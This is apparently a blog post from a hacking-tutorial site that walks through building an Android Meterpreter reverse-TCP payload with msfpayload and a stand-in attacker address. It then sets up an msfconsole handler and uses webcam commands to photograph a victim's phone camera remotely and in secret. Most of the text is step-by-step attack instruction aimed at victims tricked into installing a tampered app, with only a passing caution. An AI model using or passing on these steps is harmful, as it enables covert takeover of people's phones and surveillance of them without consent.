STEP 1: Pull up your Linux terminal and use the Metasploit payload framework:
Msfpayload android/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=
<PORT TO RECEIVE CONNECTION>
Execute the command.
STEP 2: The payload we used here is reverse_tcp - with this, the attacker will expect the victim to connect to the attacking machine. The attacker will then need to set up the handler to work with incoming connections to the specified port. Type the msfconsole command and go to the software’s console.
On the line that says “msf exploit (handler) >”, type “set lhost <ATTACKER_IP>”, and then “set lport <PORT TO RECEIVE CONNECTION>”. Then, type “exploit” to begin
listening to incoming communication.
The Metasploit framework will notify you once the reverse handler has started, and once the Meterpreter session has opened. This would mean that you can now do everything with the victim’s phone! Try typing “webcam_list” and then “webcam_snap 1” or “webcam_snap 2” for starters. This snaps a pic from the phone’s front or back camera - all done remotely and in secrecy, and sent to you!
Of course, all this would be done assuming that the victims download the tampered app. As a hacker-in-training, you should know better than installing apps from unauthorized sources unless you can read the APK’s source codes. The hack we had featured here is pretty easy compared to what highly accomplished hacker-programmers can do - things like creating a 3D map of your home or office through randomly taken snapshots. Yes, much like Dark Knight or Iron Man 3. Look up the US military’s PlaceRaider app to see what we mean.
http://howtohacksmarter.blogspot.si/2015/11/getting-started-hacking-android-smart.html
No comments:
Post a Comment